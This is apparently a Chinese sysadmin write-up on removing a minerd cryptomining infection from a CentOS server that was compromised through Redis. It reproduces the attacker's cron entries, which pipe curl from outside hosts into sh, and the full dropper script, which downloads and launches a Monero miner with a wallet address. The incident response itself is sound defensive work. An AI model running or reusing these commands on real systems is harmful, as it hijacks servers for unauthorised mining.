彻底清除Linux centos minerd木马 实战 跟redis的设置有关

top -c把cpu占用最多的进程找出来：

Tasks: 136 total,   2 running, 133 sleeping,   0 stopped,   1 zombie
Cpu(s): 72.2%us,  5.9%sy,  0.0%ni, 17.5%id,  0.0%wa,  0.0%hi,  0.1%si,  4.3%st
Mem:  16330820k total,  4093308k used, 12237512k free,   339564k buffers
Swap:        0k total,        0k used,        0k free,  1121232k cached

  PID USER      PR  NI  VIRT  RES  SHR S %CPU %MEM    TIME+  COMMAND                                                    
11159 root      20   0  381m 9664 1068 S 299.5  0.1  12416:17 ./minerd -B -a cryptonight -o stratum+tcp://xmr.crypto-poo

定位程序的位置：

# locate minerd 
/home/minerd

# chmod -x minerd

查看一下计划任务的时志：

sh-4.1# tail -f /var/log/cron
Jan  8 16:01:01 xxxx run-parts(/etc/cron.hourly)[13303]: finished 0anacron
Jan  8 16:05:01 xxxx CROND[13307]: (root) CMD (/usr/bin/curl -fsSL http://sx.doiton.tk/test.sh | sh)
Jan  8 16:10:01 xxxx CROND[13332]: (root) CMD (/usr/bin/curl -fsSL http://sx.doiton.tk/test.sh | sh)
Jan  8 16:10:01 xxxx CROND[13333]: (root) CMD (/usr/lib64/sa/sa1 1 1)
Jan  8 16:15:01 xxxx CROND[13380]: (root) CMD (/usr/bin/curl -fsSL http://sx.doiton.tk/test.sh | sh)
Jan  8 16:20:01 xxxx CROND[13407]: (root) CMD (/usr/bin/curl -fsSL http://sx.doiton.tk/test.sh | sh)
Jan  8 16:20:01 xxxx CROND[13408]: (root) CMD (/usr/lib64/sa/sa1 1 1)
Jan  8 16:25:01 xxxx CROND[13432]: (root) CMD (/usr/bin/curl -fsSL http://sx.doiton.tk/test.sh | sh)
Jan  8 16:30:01 xxxx CROND[13470]: (root) CMD (/usr/bin/curl -fsSL http://sx.doiton.tk/test.sh | sh)
Jan  8 16:30:01 xxxx CROND[13471]: (root) CMD (/usr/lib64/sa/sa1 1 1)

sh-4.1# crontab -l
REDIS0007�    redis-ver3.2.5
��
crackit@G�ctime��qXused-mem� 


*/5 * * * * /usr/bin/curl -fsSL http://sx.doiton.tk/test.sh | sh

把脚本wget下来看一下内容：

#!/bin/bash
Jin=`ps -ef|grep minerd|grep -v grep|wc -l`
Pid=`ps -ef|grep minerd|grep -v grep|awk '{print $2}'`
Wk=`ps -ef|grep 44GpQ3X9aCR5fMfD8myxKQcAYjkTdT5KrM4NM2rM9yWnEkP28mmXu5URUCxwuvKiVCQPZaoYkpxxzKoCpnED6Gmb2wWJRuN|grep -v grep|wc -l`
if [ $Jin -eq  1 ];then
  if [ $Wk -eq  0 ];then
        kill -9 $Pid
        nohup /opt/minerd -B -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:80 -u 44GpQ3X9aCR5fMfD8myxKQcAYjkTdT5KrM4NM2rM9yWnEkP28mmXu5URUCxwuvKiVCQPZaoYkpxxzKoCpnED6Gmb2wWJRuN -p x &
  fi
else
  kill -9 $Pid
        nohup /opt/minerd -B -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:80 -u 44GpQ3X9aCR5fMfD8myxKQcAYjkTdT5KrM4NM2rM9yWnEkP28mmXu5URUCxwuvKiVCQPZaoYkpxxzKoCpnED6Gmb2wWJRuN -p x &
fi
if  [ $Jin -eq  0 ];then
   mkdir /home -p 
   &&  cd /home 
   &&  curl -L http://sx.doiton.tk/minerd -o minerd
   &&  chmod +x minerd 
   &&  nohup ./minerd -B  -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:80 -u 44GpQ3X9aCR5fMfD8myxKQcAYjkTdT5KrM4NM2rM9yWnEkP28mmXu5URUCxwuvKiVCQPZaoYkpxxzKoCpnED6Gmb2wWJRuN -p x &
fi

杀掉minerd

sh-4.1# pkill minerd

清空计划任务:

# crontab -r
sh-4.1# crontab -l
no crontab for root

查看/root/.ssh发现有导常：

sh-4.1# file root 
root: data
sh-4.1# cat root 
REDIS0007�    redis-ver3.2.5
��
crackit@z�ctime®


*/5 * * * * /usr/bin/curl -fsSL http://d.nrfly.com/v/down.php?u=ad1b7c3c18fdfa9a7c7e5baf5fab9c42.undefined.mp3 | sh



��wx��]sh-4.1# pwd
/root/.ssh

下载下来该文件，查看内容：

[root@NB movies]# file down.php?u=ad1b7c3c18fdfa9a7c7e5baf5fab9c42.undefined.mp3 
down.php?u=ad1b7c3c18fdfa9a7c7e5baf5fab9c42.undefined.mp3: HTML document text
# 发现是html代码

把这个文件清除掉

sh-4.1# rm root